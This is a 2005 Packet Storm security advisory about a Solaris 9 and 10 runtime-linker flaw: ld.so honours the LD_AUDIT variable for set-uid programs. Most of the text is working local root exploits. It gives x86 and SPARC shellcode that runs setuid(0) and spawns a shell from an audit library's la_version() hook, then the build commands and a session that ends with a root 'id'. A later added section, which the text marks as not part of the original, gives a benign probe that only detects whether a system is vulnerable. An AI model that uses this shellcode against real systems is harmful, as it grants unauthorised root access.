ldsoWhoops.txt

2005-06-29T00:00:00
ID PACKETSTORM:38321
Type packetstorm
Reporter Venglin
Modified 2005-06-29T00:00:00

Description

                                        
                                            `ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when  
running s[ug]id binaries, allowing to run arbitrary code with elevated  
privileges. Well, I can't belive, that such trivial vulnerability exists in  
modern OS...  
  
The following PoC code was tested on:  
  
- SunOS 5.10 Generic i86pc i386 i86pc  
- SunOS 5.9 Generic_112233-12 sun4u  
  
It does NOT work on:

- SunOS 5.8 Generic_117350-02 sun4u sparc
  
Example on unpatched Solaris 10 (AMD64):  
  
atari:venglin:~> cat dupa.c
/* Solaris/x86 payload: the stub first patches its own lcall into the
 * $7,$0 system call gate, then does setuid(0) (syscall 23) and
 * execve("/bin/sh", ["/bin/sh"], NULL) (syscall 11). It lives in a
 * writable data segment because it patches itself, and it relies on
 * that segment also being executable (no NX on this target). */
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

/* The runtime linker calls la_version() right after it loads the library
 * named in LD_AUDIT, before the set-uid target executes any code of its
 * own, so the payload already runs with the target's effective uid. */
int la_version() {
        void (*f)();
        f = (void*)sh;
        f();            /* never returns: the shell replaces the process */
        return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
  
  
  
Solaris 9 on SPARC:  
  
$ cat dupa.c
/* Solaris/SPARC payload: setuid(0) (syscall 23) followed by
 * execve("/bin/ksh", argv = ["/bin/ksh"]) (syscall 11). The execve stub
 * finds the string through the call/%o7 trick and stores argv[] into the
 * bytes right after it, so the array must be writable data (and the
 * segment executable). */
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* Called by the runtime linker as soon as the audit library is loaded,
 * before the set-uid target's own code runs. */
int la_version() {
        void (*f)();
        f = (void*)sh;
        f();            /* never returns: ksh replaces the process */
        return 3;
}

$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
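Before running either PoC, a practitioner usually wants a non-destructive way to tell whether a given ld.so honors LD_AUDIT for set-uid/set-gid targets at all. The audit library below is an added example and is not part of the original advisory: it executes no payload, it only reports from la_version() whether it was loaded into a process whose real and effective IDs differ. The file and library names (ldaudit_probe.c, ldaudit_probe.so) and the report format are my own choice.

```c
/* ldaudit_probe.c: benign LD_AUDIT library that reports where it was loaded.
 * Added example, not part of the original advisory. Build with
 *   gcc -fPIC -shared -o /tmp/ldaudit_probe.so ldaudit_probe.c
 * and run, e.g.,  LD_AUDIT=/tmp/ldaudit_probe.so /usr/bin/passwd
 * (any set-uid binary will do; interrupt it once the probe line appears). */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Pure decision: do these credentials mean we are inside a set-id process? */
int set_id_mismatch(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Same check against the live credentials of the calling process. */
int process_is_set_id(void)
{
    return set_id_mismatch(getuid(), geteuid(), getgid(), getegid());
}

/* Build the one-line report the probe prints. Kept separate from the I/O so
 * the message can be checked without loading the library into anything.
 * Returns the snprintf() length. */
int format_report(char *buf, size_t len, pid_t pid,
                  uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    const char *verdict = set_id_mismatch(ruid, euid, rgid, egid)
        ? "LD_AUDIT HONORED IN SET-ID PROCESS (vulnerable)"
        : "ordinary process";
    return snprintf(buf, len,
        "[ldaudit_probe] pid %ld uid=%ld euid=%ld gid=%ld egid=%ld: %s\n",
        (long)pid, (long)ruid, (long)euid, (long)rgid, (long)egid, verdict);
}

/* First audit interface the runtime linker calls after loading the library,
 * i.e. before the target's main(). Returning the offered version keeps the
 * library active; the target then continues running normally. */
unsigned int la_version(unsigned int version)
{
    char line[160];
    format_report(line, sizeof line, getpid(),
                  getuid(), geteuid(), getgid(), getegid());
    /* write(2) rather than stdio: we run before the target has set anything up */
    write(STDERR_FILENO, line, strlen(line));
    return version;
}
```

On a fixed runtime linker the probe line never appears for a set-uid target, because the variable is discarded before any library is loaded; running the same command against a non-set-uid binary prints "ordinary process", which confirms the library itself is loadable. On a vulnerable ld.so the line appears for the set-uid target with the "vulnerable" verdict and the owner's uid as euid.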
  
--   
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *  
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *  